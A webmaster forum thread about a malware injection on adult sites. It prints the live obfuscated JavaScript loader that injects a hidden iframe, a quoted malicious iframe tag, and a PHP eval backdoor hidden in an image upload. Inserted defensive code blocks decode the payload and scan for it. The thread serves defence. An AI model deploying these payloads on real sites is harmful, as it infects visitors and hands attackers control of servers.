Got hacked! Help!

  • HEAT
    Confirmed User
    • Sep 2003
    • 2255

    #1


    Some of my sites that use TGPX, TEVS and Comus Thumbs are getting a malware injection attack. One of my dedicated servers got hit by a malware distributor.
    The code below is injected right after the body tag of .html, .tmpl and some .php files.

    Code:
    <script>/**/function VtL2(RoHS, Nvy4, Ipv6) { var CnP8; CnP8=RoHS.split(Nvy4); var igs6=CnP8.join(Ipv6); return igs6;/**/ }
    function PKs7(cie8) { cie8 = VtL2(cie8,"##+##","'"); cie8 = VtL2(cie8,"##|##","\\"); igs6=""; gbq5 =""; for(k=0;k<cie8.length;k++) { igs6 = cie8.charCodeAt(k); if (igs6==32){igs6=35} else if (igs6==35){igs6=32} else if (igs6==59){igs6=64} else if (igs6==64){igs6=59} else if (igs6==37){igs6=42} else if (igs6==42){igs6=37} else if (igs6>=97 && igs6<=122) { igs6=igs6-97;igs6=25-igs6;igs6+=97; }else if (igs6>=65 && igs6<=90) { igs6=igs6-65;igs6=25-igs6;igs6+=65; }else if (igs6>=48 && igs6<=57) { igs6=igs6-48;igs6=9-igs6;igs6+=48; } gbq5 += String.fromCharCode(igs6); } return gbq5;/**/ }
    bqL1=eval;var RoSt;var Ldod;var CEg0;var Kil2;var cbk1;var Zku4;var Lfo0;
    bqL1(PKs7('Apf5#=###+##sggk://tzbhvc634.xln/hg/xhh/a/hgzgrx.ksk##+##@xyp8#=###+##ruiznv##+##@'));
    bqL1(PKs7('IlHg#=#wlxfnvmg.xivzgvVovnvmg(xyp8)@IlHg.hvgZggiryfgv(##+##hix##+##,#Apf5)@'));
    bqL1(PKs7('IlHg.hvgZggiryfgv(##+##drwgs##+##,9)@IlHg.hvgZggiryfgv(##+##svrtsg##+##,9)@IlHg.hvgZggiryfgv(##+##yliwvi##+##,9)@'));
    bqL1(PKs7('IlHg.hvgZggiryfgv(##+##hgbov##+##,##+##drwgs:#9@#svrtsg:#9@#yliwvi:#mlmv@##+##)@'));
    bqL1(PKs7('IlHg.hvgZggiryfgv(##+##hgbov##+##,##+##wrhkozb:mlmv##+##)@#Oul9=mzertzgli.fhviZtvmg.glOldviXzhv()@'));
    bqL1(PKs7('XVt9=Oul9.rmwvcLu(##+##nhrv##+##)@Owlw=Oul9.rmwvcLu(##+##nhrv#1##+##)@Pro7=Oul9.rmwvcLu(##+##mg#3##+##)@'));
    if ((Ldod==-1)&&(CEg0>0)&&(Kil2==-1)){bqL1(PKs7('wlxfnvmg.ylwb.zkkvmwXsrow(IlHg)@'));}</script>
    I wonder if any of you guys have had the same experience and any luck detecting and removing it permanently? After throwing out my PC, uploading AVG and Spybot, changing all my passwords and dropping FTP in favor of SFTP, I have now taken up the process of manually removing the code above.
    But they keep adding this JS code even after I remove it...

    Since the box is unmanaged, maybe I will have to reload the server OS and restore all files from backup, but I'm worried that the backup is infected as well...

    Beware, guys: check your server security, file/dir permissions, etc. Your PC is not safe either. Install a good anti-malware product and don't save passwords in your local FTP client.

    http://www.webhostingtalk.com/showth...rame+injection
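The injected script above decodes its own payload at run time and hands the result to eval. As an added example (not code from the post, nor from TGPX, TEVS or Comus), here is a readable Node.js port of its PKs7 decoder, fed with the seven encoded strings copied from the sample, plus the user-agent gate the last statement is wrapped in. Decoded, the strings create a hidden iframe whose src is a static.php on a third-party host and append it to the document body only for Internet Explorer older than 8 on Windows older than NT 6 (Vista), which is why other browsers and newer IE versions never show the iframe. The function names and the sample user-agent strings are mine.

```javascript
// Added example, not from the post: a readable port of the injected script's
// decoder (PKs7) so the payload can be inspected without ever calling eval.
// ENCODED holds the seven strings copied verbatim from the sample in the post.
const ENCODED = [
  "Apf5#=###+##sggk://tzbhvc634.xln/hg/xhh/a/hgzgrx.ksk##+##@xyp8#=###+##ruiznv##+##@",
  "IlHg#=#wlxfnvmg.xivzgvVovnvmg(xyp8)@IlHg.hvgZggiryfgv(##+##hix##+##,#Apf5)@",
  "IlHg.hvgZggiryfgv(##+##drwgs##+##,9)@IlHg.hvgZggiryfgv(##+##svrtsg##+##,9)@IlHg.hvgZggiryfgv(##+##yliwvi##+##,9)@",
  "IlHg.hvgZggiryfgv(##+##hgbov##+##,##+##drwgs:#9@#svrtsg:#9@#yliwvi:#mlmv@##+##)@",
  "IlHg.hvgZggiryfgv(##+##hgbov##+##,##+##wrhkozb:mlmv##+##)@#Oul9=mzertzgli.fhviZtvmg.glOldviXzhv()@",
  "XVt9=Oul9.rmwvcLu(##+##nhrv##+##)@Owlw=Oul9.rmwvcLu(##+##nhrv#1##+##)@Pro7=Oul9.rmwvcLu(##+##mg#3##+##)@",
  "wlxfnvmg.ylwb.zkkvmwXsrow(IlHg)@",
];

// One character of the sample's substitution: swap ' '<->'#', ';'<->'@', '%'<->'*',
// and mirror letters and digits (a<->z, A<->Z, 0<->9), i.e. Atbash plus three swaps.
function decodeChar(ch) {
  const c = ch.charCodeAt(0);
  const swaps = { 32: 35, 35: 32, 59: 64, 64: 59, 37: 42, 42: 37 };
  if (c in swaps) return String.fromCharCode(swaps[c]);
  if (c >= 97 && c <= 122) return String.fromCharCode(97 + 25 - (c - 97));
  if (c >= 65 && c <= 90) return String.fromCharCode(65 + 25 - (c - 65));
  if (c >= 48 && c <= 57) return String.fromCharCode(48 + 9 - (c - 48));
  return ch;
}

// Same steps as PKs7: "##+##" stands for a single quote and "##|##" for a
// backslash, then every character goes through the substitution above.
function decode(s) {
  const unescaped = s.split("##+##").join("'").split("##|##").join("\\");
  return Array.from(unescaped, decodeChar).join("");
}

// All seven statements the sample would have handed to eval, in order.
function decodePayload() {
  return ENCODED.map(decode);
}

// The gate around the last statement: CEg0 = indexOf('msie'), Ldod = indexOf('msie 8'),
// Kil2 = indexOf('nt 6') on the lowercased user agent; the iframe is appended only when
// Ldod == -1 && CEg0 > 0 && Kil2 == -1, i.e. IE older than 8 on Windows older than NT 6.
function wouldInject(userAgent) {
  const ua = userAgent.toLowerCase();
  return ua.indexOf("msie 8") === -1 && ua.indexOf("msie") > 0 && ua.indexOf("nt 6") === -1;
}

if (typeof require !== "undefined" && require.main === module) {
  decodePayload().forEach((line) => console.log(line));
  // Constructed sample user agents (assumptions for illustration).
  console.log(wouldInject("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)")); // true
  console.log(wouldInject("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)")); // false
}
```

Because the gate is evaluated client-side, a server-side scan for the injection must look for the encoded block itself (the `/**/function` opener and the `##+##` placeholders), not for an iframe tag: the iframe never exists in the HTML on disk.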
  • asianseekerz
    Confirmed User
    • Aug 2008
    • 1609

    #2
    Change your index page, delete the page having that code, then change all your access.


    • notime
      Confirmed User
      • Jun 2003
      • 8025

      #3
      Is it this one?
      forums.digitalpoint.com/showthread.php?t=901622


      • k0nr4d
        Confirmed User
        • Aug 2006
        • 9231

        #4
        This is usually caused by a virus on your computer. Have your host check the FTP logs, and I bet you will have a bunch of unknown logins. These viruses append this code to any file named index.php, index.html, etc.

        • katharos
          So Fucking Banned
          • Nov 2005
          • 1515

          #5
          I am amazed how many webhosts have easy-to-hack FTP logins...


          • BestXXXPorn
            Confirmed User
            • Jun 2009
            • 2277

            #6
            If it's not caused by your own computer, it may also be caused by something on your site...

            If you have photo uploads... it's possible someone has uploaded a fake image that is actually running code...

            You may also have your permissions set wrong on the files on your server, allowing someone to exploit your box and add things to the content...

            • qxm
              Confirmed User
              • Jul 2006
              • 5970

              #7
              Originally posted by HEAT
              After throwing out my PC, uploading AVG and Spybot, changing all my passwords and dropping FTP in favor of SFTP, I have now taken up the process of manually removing the code above.
              Are you on a Windows server? ..... At any rate.... you shouldn't be using AVG... that shit is crap (yeah, redundant, I know). I got infected by 9 types of trojans, malware, fuckware, 666-satanic-ware and viruses while using it and the piece of crap didn't detect any problem at all.... so you'd better use something with better heuristics... Avira or Avast.

              Good luck getting that code out of your sites too...


              • directfiesta
                Too lazy to set a custom title
                • Oct 2002
                • 30135

                #8
                Originally posted by katharos
                I am amazed how many webhosts have easy-to-hack FTP logins...
                Maybe you should replace "webhosts" with "webmasters".

                • Davy
                  Confirmed User
                  • Apr 2006
                  • 4323

                  #9
                  Do yourself a favor and find the security hole before you fix the site.
                  You need to find how they got in (assuming they hacked your server).

                  • HomerSimpson
                    Too lazy to set a custom title
                    • Sep 2005
                    • 13826

                    #10
                    here's my guide:

                    step 1: Update your Adobe Reader to the latest version (9.xx) or, even better, remove it and install Foxit Reader (much smaller and faster).

                    step 2: Update the Flash Player plugins for IE and FF.

                    step 3: Download 2-3 anti-spyware programs and check your computer.

                    step 4: Once you are clean, log in, change all your passwords and fix the sites.

                    step 5: Monitor what's going on...

                    - - - -

                    extra steps

                    * Download and use Total Commander 7.5, which has a password encryption option that makes your passwords safe (I haven't found this in any other software, and that's the weakest point of most FTP clients).

                    * Always have anti-virus, firewall and anti-spyware apps active (I use NOD32 Smart Security AV+FW + Ad-Aware).

                    * Use only Firefox and Chrome instead of IE.

                    All the software mentioned you can find and download at http://www.filehorse.com

                    • Spudman
                      Confirmed User
                      • Aug 2002
                      • 3198

                      #11
                      Dude, it's a Comus Thumbs issue as far as I'm aware. I'm currently deleting all my Comus installs (over 40) and replacing the script with a new one, as I was hit with this hack 3 days ago and am still fixing it.
                      I have used Comus for over 5 years and these hacks are all too regular these days; they never update Comus and it's going to shit, so I would delete it and rebuild the site with a new script.

                      My 2 cents.

                      • katharos
                        So Fucking Banned
                        • Nov 2005
                        • 1515

                        #12
                        Originally posted by directfiesta
                        Maybe you should replace "webhosts" with "webmasters".
                        Webmasters also, but I mean there are no limits on brute-forcing FTP; you can have one proxy and brute-force to infinity.


                        • TGThomas
                          Registered User
                          • Jan 2008
                          • 75

                          #13
                          Were you using FileZilla to upload? I know a while back there was a problem with that program letting a virus in to change your .php files.

                          • split_joel
                            Confirmed User
                            • Jan 2005
                            • 2270

                            #14
                            Okay a few things here,

                            What scripts are you running on your server? Are you running Joomla? What are the directory permissions of your PHP files? Hit me up on AIM or ICQ if your host isn't going to fix it for you, as I hate people that hack sites more than anything on the face of the damn planet.

                            • HEAT
                              Confirmed User
                              • Sep 2003
                              • 2255

                              #15
                              Originally posted by notime
                              Is it this one?
                              forums.digitalpoint.com/showthread.php?t=901622
                              Not sure but looks like it.

                              • HEAT
                                Confirmed User
                                • Sep 2003
                                • 2255

                                #16
                                Problem solved.

                                When the script is executed (I visited an infected site accidentally yesterday, I guess), it loaded malware disguised as a .pdf or .swf file that steals username/password data from the PC.
                                The malware is hosted at another infected site, loaded via iframe, then executed in the browser.
                                Now the hacker got my site's login and infected my sites too.
                                I don't know how he connected to my box, though. I guess he's using a remote script that doesn't leave log info.

                                Even if I remove that malware from my PC and change the FTP password, the hacker can get my new password easily, since I had to load my sites to check.
                                So it is very important to never load the sites during troubleshooting.

                                This is what I did, and it seems like the code is finally gone, but I'm still monitoring...
                                1. Reboot the PC and scan it for spyware.
                                2. Reboot again and change all server passwords.
                                3. Remove the code from all server files (index.html, category.html, index.php, etc.) with a server-side text editor.
                                4. Never load infected web pages in a browser during #3.
                                5. Install mod_security and change file permissions.

                                This thing reminds me of Back Orifice in '98. It's the most annoying fuckware I have ever had. It got past McAfee.
                                Remember to use a good antivirus on your PC. I had good results with Malwarebytes.org.

                                Thanks for the advice.
                                Last edited by HEAT; 09-17-2009, 10:21 AM.

                                • borked
                                  Totally Borked
                                  • Feb 2005
                                  • 6284

                                  #17
                                  And another reason not to use FTP, but SFTP...

                                  A security researcher has discovered a cluster of infected Linux servers that have been corralled into a special ops botnet of sorts and used to distribute malware to unwitting people browsing the web.

                                  Each of the infected machines examined so far is a dedicated or virtual dedicated server running a legitimate website, Denis Sinegubko, an independent researcher based in Magnitogorsk, Russia, told The Register. But in addition to running an Apache webserver to dish up benign content, they've also been hacked to run a second webserver known as nginx, which serves malware.
                                  ...
                                  The infected machines observed by Sinegubko serve legitimate traffic on port 80, the standard TCP port used by websites. Behind the scenes, the rogue server sends malicious traffic over port 8080. The malicious payloads are then delivered with the help of dynamic DNS hosting providers, which offer free domain names that are mapped to the IP address of the zombie webserver.

                                  The links look something like this:
                                  Code:
                                  <i_frame src="http ://a86x . homeunix . org:8080/ts/in.cgi?open2" width=997 height=0 style="visibility: hidden"></iframe>
                                  They are injected into legitimate websites, so that they are surreptitiously served when users browse the infected page.

                                  It's unclear exactly how the servers have become infected. Sinegubko speculates they belong to careless administrators who allowed their root passwords to be sniffed. Indeed, the part of the multi-staged attack that plants malicious iframes into legitimate webpages uses FTP passwords that have been stolen using password sniffers. It's likely the zombie servers were compromised in the same fashion, he explained.


                                  • HEAT
                                    Confirmed User
                                    • Sep 2003
                                    • 2255

                                    #18
                                    Originally posted by Spudman
                                    Dude, it's a Comus Thumbs issue as far as I'm aware. I'm currently deleting all my Comus installs (over 40) and replacing the script with a new one, as I was hit with this hack 3 days ago and am still fixing it.
                                    I have used Comus for over 5 years and these hacks are all too regular these days; they never update Comus and it's going to shit, so I would delete it and rebuild the site with a new script.

                                    My 2 cents.

                                    Yep, looks like Comus is gonna be dead soon. Lots of security holes and no updates.
                                    Also going to drop it ASAP.

                                    • HEAT
                                      Confirmed User
                                      • Sep 2003
                                      • 2255

                                      #19
                                      Originally posted by split_joel
                                      Okay a few things here,

                                      What scripts are you running on your server? Are you running Joomla? What are the directory permissions of your PHP files? Hit me up on AIM or ICQ if your host isn't going to fix it for you, as I hate people that hack sites more than anything on the face of the damn planet.
                                      No Joomla; running various TGP/tube scripts. Permissions were set to 755 for directories, and PHP files had various permissions as I followed the script manuals.
                                      Most are 644; data/template dirs and files were set to 777.
                                      I changed lots of files to 444 for monitoring.
                                      Will contact you if I get the code again. Thanks!

                                      • Spudstr
                                        Confirmed User
                                        • Jan 2003
                                        • 2321

                                        #20
                                        This exploit is going around, and it seems Comus is the problem, from watching the audit logs and investigating. If a server has Comus installed, then unless it is set up with 1 domain per login etc., due to permissions (i.e. having 777 on things you should not) it will infect a whole mess of files and leave backdoors everywhere.

                                        • Klen
                                          • Aug 2006
                                          • 32235

                                          #21
                                          Welcome to the club; my one old unsecured machine is also hacked with the exact same crap. I'm working now on removing it. And yes, I do have several Comus installations there. But I don't see how a Comus bug can affect all possible sites, no matter whether they are based on ST, TGPX or something else (and I have all three rotator scripts installed).


                                          • smoothballs
                                            Confirmed User
                                            • Aug 2004
                                            • 151

                                            #22
                                            Yep, my Comus sites are hacked too, for the last couple of days.... fucking me off thinking how many will not return 'cos of warnings thrown up by their anti-virus.... already had an email from Google saying they have tagged my highest-traffic site with a "this site could harm your computer" in their search pages... just waiting for more emails from them for my other Comus sites!


                                            • Klen
                                              • Aug 2006
                                              • 32235

                                              #23
                                              Originally posted by smoothballs
                                              Yep, my Comus sites are hacked too, for the last couple of days.... fucking me off thinking how many will not return 'cos of warnings thrown up by their anti-virus.... already had an email from Google saying they have tagged my highest-traffic site with a "this site could harm your computer" in their search pages... just waiting for more emails from them for my other Comus sites!
                                              Ugh, and the problem is the code appears again once it's removed. First I tried chmod 644, then chown to apache, and it still shows up again. Well, if it's a Comus problem, then the only solution would be to completely delete all Comus installations.


                                              • Spudstr
                                                Confirmed User
                                                • Jan 2003
                                                • 2321

                                                #24
                                                Originally posted by KlenTelaris
                                                Welcome to the club; my one old unsecured machine is also hacked with the exact same crap. I'm working now on removing it. And yes, I do have several Comus installations there. But I don't see how a Comus bug can affect all possible sites, no matter whether they are based on ST, TGPX or something else (and I have all three rotator scripts installed).
                                                Any file that is set to 777 or owned by apache/httpd can be edited by the exploit.

                                                • Klen
                                                  • Aug 2006
                                                  • 32235

                                                  #25
                                                  Originally posted by Spudstr
                                                  Anyfile that is set to 777 or owned by apache/httpd can be edited by the exploit.
                                                  Well, I set index.php to 644 and it's not helping.


                                                  • smoothballs
                                                    Confirmed User
                                                    • Aug 2004
                                                    • 151

                                                    #26
                                                    Originally posted by KlenTelaris
                                                    Ugh, and the problem is the code appears again once it's removed. First I tried chmod 644, then chown to apache, and it still shows up again. Well, if it's a Comus problem, then the only solution would be to completely delete all Comus installations.
                                                    Thing is, I don't see any malicious code in view source... just the anti-virus pop-up warning... after a refresh I don't get any warnings at all...


                                                    • area51 - BANNED FOR LIFE
                                                      So Fucking Banned
                                                      • Aug 2009
                                                      • 3163

                                                      #27
                                                      Look at all the morons in here.


                                                      • smoothballs
                                                        Confirmed User
                                                        • Aug 2004
                                                        • 151

                                                        #28
                                                        Here's a quote from my host when I told them not to bother scanning my sites, as it looks like a Comus issue...

                                                        "Yes, Comus Thumbs has been causing a lot of issues lately "


                                                        • Klen
                                                          • Aug 2006
                                                          • 32235

                                                          #29
                                                          OK, so we concluded Comus is the cause of this? So I can start removing it.


                                                          • smoothballs
                                                            Confirmed User
                                                            • Aug 2004
                                                            • 151

                                                            #30
                                                            Originally posted by area51
                                                            look at all the morons in here
                                                            Looks like there is only one moron in here who can't contribute anything... was that the most intelligent thing to come out of your mouth since Einstein's dick????


                                                            • notime
                                                              Confirmed User
                                                              • Jun 2003
                                                              • 8025

                                                              #31
                                                              Originally posted by HEAT
                                                              Not sure but looks like it.
                                                              I had it on my server so I know.
                                                              It happened when I was on the plane to the Montreal show.
                                                              That sucked, but it was resolved in like 20 minutes after I found it; it was fixed by the programmers and system engineers.


                                                              • BestXXXPorn
                                                                Confirmed User
                                                                • Jun 2009
                                                                • 2277

                                                                #32
                                                                "But in addition to running an Apache webserver to dish up benign content, they've also been hacked to run a second webserver known as nginx, which serves malware."

                                                                Hahahaha, not only does it serve up malware, it serves up malware faster and more efficiently. Hahahaha, man, that really cracks me up in a very geeky way, hahaha.

                                                                • notime
                                                                  Confirmed User
                                                                  • Jun 2003
                                                                  • 8025

                                                                  #33
                                                                  Originally posted by KlenTelaris
                                                                  Ok so we concluded comus is cause of this?So i can start removing it.
                                                                  I don't have comus or use it.

                                                                  The infection did not even take place on any of my office PCs, but in the office a few blocks down the street where the designers and programmers have their office.
                                                                  One guy there had an infected PC that had FTP access to one of my servers. Not sure if they use Comus or not, but I don't think so. Infection takes place through infected adult websites in all popular browsers without anti-virus programs seeing it.

                                                                  Hidden custom-built (FTP) logs show somebody using my FTP user/pass, without brute force, entering and adding some files and making some changes similar to all infected victims.


                                                                  • BestXXXPorn
                                                                    Confirmed User
                                                                    • Jun 2009
                                                                    • 2277

                                                                    #34
                                                                    Originally posted by KlenTelaris
                                                                    Well, I set index.php to 644 and it's not helping.
                                                                    Setting it to 644 alone won't help you... What are the owner and group of the file? If they are the same as what the webserver runs as, then any exploit which is passing through your webserver will have full access to the file...

                                                                    If someone has already hacked your box you have way more issues to worry about... First things first:

                                                                    http://www.rootkit.nl/projects/rootkit_hunter.html

                                                                    Download it, install it, run it, then you can rule out most rootkits and learn if your box has been compromised or not...

                                                                    If it has, you know the problem... if it hasn't then you can move onto the next step.

                                                                    GL!

                                                                    • V_RocKs
                                                                      Damn Right I Kiss Ass!
                                                                      • Nov 2003
                                                                      • 32449

                                                                      #35
                                                                      Actually, old Comus is hackable... These are usually NOT FTP access problems and are problems with PHP scripts being hackable.

                                                                      • Klen
                                                                        • Aug 2006
                                                                        • 32235

                                                                        #36
                                                                        Originally posted by BestXXXPorn
                                                                        Setting to 644 alone won't help you... What is the owner and group of the file? If it's set to the same as the webserver runs as then any exploit which is passing through your webserver will have full access to the file...

                                                                        If someone has already hacked your box you have way more issues to worry about... First things first:

                                                                        http://www.rootkit.nl/projects/rootkit_hunter.html

                                                                        Download it, install it, run it, then you can rule out most root kits and learn if your box has been compromised or not...

                                                                        If it has, you know the problem... if it hasn't then you can move onto the next step.

                                                                        GL!
                                                                        That was the first thing I did, but it didn't find any rootkit installed. Also I just noticed the JavaScript on Comus sites, and on others it's not the same.

                                                                        • Klen
                                                                          • Aug 2006
                                                                          • 32235

                                                                          #37
                                                                          Here are copy-pastes of the JavaScript code:
                                                                          http://pastebin.com/m53fc9126
                                                                          http://pastebin.com/m1b861dd8

                                                                          • Spudman
                                                                            Confirmed User
                                                                            • Aug 2002
                                                                            • 3198

                                                                            #38
                                                                            All my sites were hacked through Comus. If you use Comus, I advise deleting it and using another script; this appears to be the only fix for me.
                                                                            Take it Easy !!!

                                                                            • HEAT
                                                                              Confirmed User
                                                                              • Sep 2003
                                                                              • 2255

                                                                              #39
                                                                              Found this from Webhostingtalk.com

                                                                              It is a series of viruses implanted on various PCs (and some Macs we've seen) that does little more than steal FTP credentials.

                                                                              It works in a variety of ways.

                                                                              First, it knows the files and their default locations of various FTP software, FileZilla, WS_FTP and many, many others. When users tell their software to save their logon credentials, it saves this information in a file on the computer. Then when you want to send an update to your website, the login information is already there.

                                                                              The virus looks for these files, opens them, reads the information and then sends it to a server where it's used to login to the website with valid credentials. There's no need to "crack" the password. Which is why strong passwords aren't a defense in this case.

                                                                              Second, the virus installs a keyboard logger. This variant is relatively new because earlier this year the hackers saw that everyone was telling people not to save their FTP username and passwords, so the hackers started installing keyboard loggers for those who type their passwords in each time. Same follow-through, the stolen information is sent to a server that infects the web site.

                                                                              Third, the virus "sniffs" the FTP traffic leaving the PC. Since FTP transmits all data, including username and password, in plain text, it's easy for the virus to see the username and password, capture it, send it to a server and ... (you get the idea).

                                                                              Fourth, and is the most recent, the virus will inject the malscript (the infectious iframe) into the FTP data stream as it leaves the user's PC. This latest variant is sneaky in that the website logs will show that FTP traffic originated from a valid source, with valid FTP credentials.

                                                                              The best way I've found to combat this is by following these steps:

                                                                              Step 1: Install a new anti-virus program. Obviously this virus knows how to evade detection of the current anti-virus. It doesn't matter what's being used currently, you have to install something different.

                                                                              Step 2: Login to your control panel at your web hosting provider's site and change your FTP password. Write it down at this point. DO NOT ACCESS YOUR SITE with FTP until you finish all of these steps.

                                                                              Step 3: Scan and clean every PC that has FTP access to your site. This is also a must. Otherwise you have no idea whose PC it is. Do not give the new FTP passwords to anyone until after you have finished all of these steps.

                                                                              Step 4: Remove the malicious code from your webpages. If you have a known good back-up, use that. If not, download your site (yes, you'll have to type in the new password, but hopefully you've already scanned and cleaned your PC). Then open each file in your HTML editor and find the infectious code. This particular malscript usually hides immediately after the opening body tag, but we've also seen it at the end of files. You'll have to check every file on your website, not just index files or just html files. Check every file on your website, even .js and .css files.

                                                                              Step 5: Change your FTP passwords again.

                                                                              Step 6: If you've been blacklisted by Google, login to your Google Webmaster Tools and verify your site if you haven't already, then request a review. You'll have to click on your site, then across the top you'll see in your dashboard a label on a dark background that says "This site may be distributing malware. More Details" (which is a link). Click on that and request a review. If your site is clean, Google should bless you with removing that warning from SERPs.

                                                                              Then you shouldn't have that issue again.

                                                                              This is not the result of a faulty script or weak FTP passwords. It's the result of a virus on a PC with FTP access to the infected website.
                                                                              It's a solution for the malware injection attack.
                                                                              Then again, it's not recommended to install unreliable PHP scripts anyway...
                                                                              254-282-542
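
Step 4 of the procedure quoted above, as an added example (not code from the post, Webhostingtalk or Comus): a scanner that walks every file under a site directory, not just index or html files, and flags script blocks glued to the opening body tag or sitting at the end of the file that use eval/fromCharCode-style obfuscation, plus hidden iframes of the kind the post calls the "infectious iframe". The regexes, the "obfuscated" heuristic and the SAMPLE_PAGE are my own assumptions, and legitimate scripts do sometimes call eval, so review the findings before letting strip_injections() touch anything.

```python
import os
import re
from typing import List, Tuple

# Heuristics taken from the post's description: the malscript sits right after
# the opening <body> tag (sometimes at the end of the file), uses
# eval()/String.fromCharCode-style obfuscation, or is a hidden iframe.
# The patterns themselves are assumptions for this example.
BODY_TAG = re.compile(r"<body\b[^>]*>", re.I)
SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>.*?</script>", re.I | re.S)
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>(?:.*?</iframe>)?", re.I | re.S)
OBFUSCATED = re.compile(r"\beval\s*\(|fromCharCode|\bunescape\s*\(", re.I)
HIDDEN = re.compile(r"""(?:width|height)\s*=\s*["']?0\b|display\s*:\s*none"""
                    r"""|visibility\s*:\s*hidden""", re.I)

Finding = Tuple[int, int, str]   # (start offset, end offset, reason)


def find_injections(text: str) -> List[Finding]:
    """Return spans of text that look like the injected malscript or iframe."""
    findings: List[Finding] = []
    body = BODY_TAG.search(text)
    body_end = body.end() if body else -1
    for m in SCRIPT_BLOCK.finditer(text):
        if not OBFUSCATED.search(m.group(0)):
            continue
        if body_end != -1 and text[body_end:m.start()].strip() == "":
            reason = "obfuscated script immediately after <body>"
        elif text[m.end():].strip() == "":
            reason = "obfuscated script at end of file"
        else:
            reason = "obfuscated script"
        findings.append((m.start(), m.end(), reason))
    for m in IFRAME_TAG.finditer(text):
        if HIDDEN.search(m.group(0)):
            findings.append((m.start(), m.end(), "hidden iframe"))
    return sorted(findings)


def strip_injections(text: str) -> str:
    """Remove every flagged span; cut from the end so earlier offsets stay valid."""
    out = text
    for start, end, _ in reversed(find_injections(text)):
        out = out[:start] + out[end:]
    return out


def scan_tree(root: str) -> List[Tuple[str, str]]:
    """Walk every file under root (html, php, tmpl, js, css, anything) and report hits."""
    report = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            for _, _, reason in find_injections(text):
                report.append((path, reason))
    return report


# Constructed sample page for the demo, not a real infected file.
SAMPLE_PAGE = (
    "<html><head><title>t</title></head>\n"
    "<body>\n"
    "<script>x=eval;x(String.fromCharCode(97,108,101,114,116));</script>\n"
    "<p>Gallery</p>\n"
    '<script src="/js/gallery.js"></script>\n'
    '<iframe src="http://example.invalid/x" width="0" height="0" '
    'style="display:none"></iframe>\n'
    "</body></html>\n"
)


def demo() -> List[str]:
    return [reason for _, _, reason in find_injections(SAMPLE_PAGE)]


if __name__ == "__main__":
    print(demo())
    # To scan a downloaded copy of a site:
    # for path, reason in scan_tree("./site_copy"): print(path, reason)
```

Run it against a freshly downloaded copy of the site rather than the live tree, diff the cleaned output against a known-good backup where one exists, and treat a hit in a .js or .css file the same as one in index.html, since the post's point is that the payload is not confined to the obvious files.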

                                                                              • Klen
                                                                                • Aug 2006
                                                                                • 32235

                                                                                #40
                                                                                Well, the first thing I did was to completely disable FTP, but that didn't help anything. Anyway my computer was not compromised since I am not using FTP at all, only SFTP.

                                                                                • BestXXXPorn
                                                                                  Confirmed User
                                                                                  • Jun 2009
                                                                                  • 2277

                                                                                  #41
                                                                                  My favorite exploit is the fake image upload that has a correct image header...

                                                                                  If the image gets stored "as is", the first line of it is <?eval($_REQUEST['someVar']);?>

                                                                                  If the host is configured to parse image files (tracking, dynamic images, etc...) anything they pass in to the request gets evaled... so elegant, so simple, so devastating...
                                                                                  ICQ: 258-202-811 | Email: eric{at}bestxxxporn.com
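
The fake-image upload described above, as an added example (not code from the post or from any upload script it mentions): the header-only check that lets the polyglot through, beside a hardened acceptance routine that sniffs real magic bytes, requires the client's extension to agree with the sniffed type, and refuses any body carrying a PHP open tag. FAKE_GIF is built from the payload in the post; REAL_GIF is a standard 1x1 transparent GIF; the file names and the PHP_TAG regex are assumptions for the example.

```python
import os
import re
from typing import Optional, Tuple

# Real file signatures for the three common web image formats.
MAGIC = {
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
}
# Extension the server assigns on disk; the client's choice is never used.
SAFE_EXT = {"gif": ".gif", "jpeg": ".jpg", "png": ".png"}
CLIENT_EXT_OK = {"gif": {".gif"}, "jpeg": {".jpg", ".jpeg"}, "png": {".png"}}
# PHP open tags: <?php, <?=, and the short "<?" followed by an identifier
# (the post's payload starts "<?eval(").
PHP_TAG = re.compile(rb"<\?(?:php\b|=|\s*[A-Za-z_$])")


def naive_is_image(data: bytes) -> bool:
    """The check the post describes being fooled: look at the header only."""
    return any(data.startswith(sig) for sig in MAGIC)


def sniff_type(data: bytes) -> Optional[str]:
    for sig, kind in MAGIC.items():
        if data.startswith(sig):
            return kind
    return None


def hardened_accept(client_name: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason or safe extension) for an upload.

    Three checks instead of one: the magic bytes must be an allowed image
    type, the client-supplied extension must agree with the sniffed type,
    and the body must not carry a PHP open tag anywhere.
    """
    kind = sniff_type(data)
    if kind is None:
        return False, "not a recognised image header"
    ext = os.path.splitext(client_name)[1].lower()
    if ext not in CLIENT_EXT_OK[kind]:
        return False, "extension does not match content"
    if PHP_TAG.search(data):
        return False, "PHP open tag inside image data"
    return True, SAFE_EXT[kind]


# The post's polyglot: a valid GIF header followed by PHP. Constructed here.
FAKE_GIF = b"GIF89a" + b"<?eval($_REQUEST['someVar']);?>"
# A genuine 1x1 transparent GIF, for contrast.
REAL_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
            b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00"
            b"\x00\x02\x02D\x01\x00;")


def demo() -> dict:
    return {
        "naive_fake": naive_is_image(FAKE_GIF),
        "hardened_fake": hardened_accept("avatar.gif", FAKE_GIF),
        "hardened_real": hardened_accept("avatar.gif", REAL_GIF),
        "hardened_renamed": hardened_accept("avatar.php", REAL_GIF),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The tag scan rejects a few honest files whose metadata happens to contain "<?", which is the right trade-off for an upload directory. It is still only a filter: the part of the attack that matters is the host parsing image files as PHP, so uploads belong under a server-generated name in a directory where the PHP engine is switched off, ideally after being re-encoded through an image library so that nothing but pixel data survives.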

                                                                                  • escorpio
                                                                                    King of Canada
                                                                                    • Oct 2002
                                                                                    • 23487

                                                                                    #42
                                                                                    Anyone heard from Comus regarding this problem? Is a fix being worked on or should I change scripts?
                                                                                    Unvaxxed, still alive.

                                                                                    • sandman!
